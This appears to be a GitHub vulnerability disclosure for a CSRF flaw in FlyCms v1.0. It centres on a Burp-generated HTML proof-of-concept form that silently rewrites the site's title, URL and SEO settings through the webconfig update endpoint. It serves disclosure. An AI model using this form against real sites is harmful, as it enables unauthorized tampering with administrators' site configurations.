Skip to content

Latest commit

 

History

History
32 lines (25 loc) · 1.21 KB

1.md

File metadata and controls

32 lines (25 loc) · 1.21 KB

target:https://github.com/sunkaifei/FlyCms version: v1.0

FlyCms v1.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component system/site/webconfig_updagte

图片1

Poc:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.247.192/system/site/webconfig_updagte" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="fly_title" value="cscs123" />
      <input type="hidden" name="fly_url" value="http&#58;&#47;&#47;www&#46;28844&#46;com" />
      <input type="hidden" name="logo" value="" />
      <input type="hidden" name="fly_seo_title" value="123" />
      <input type="hidden" name="fly_seo_keywords" value="123" />
      <input type="hidden" name="fly_seo_description" value="123" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

图片

Successed

图片3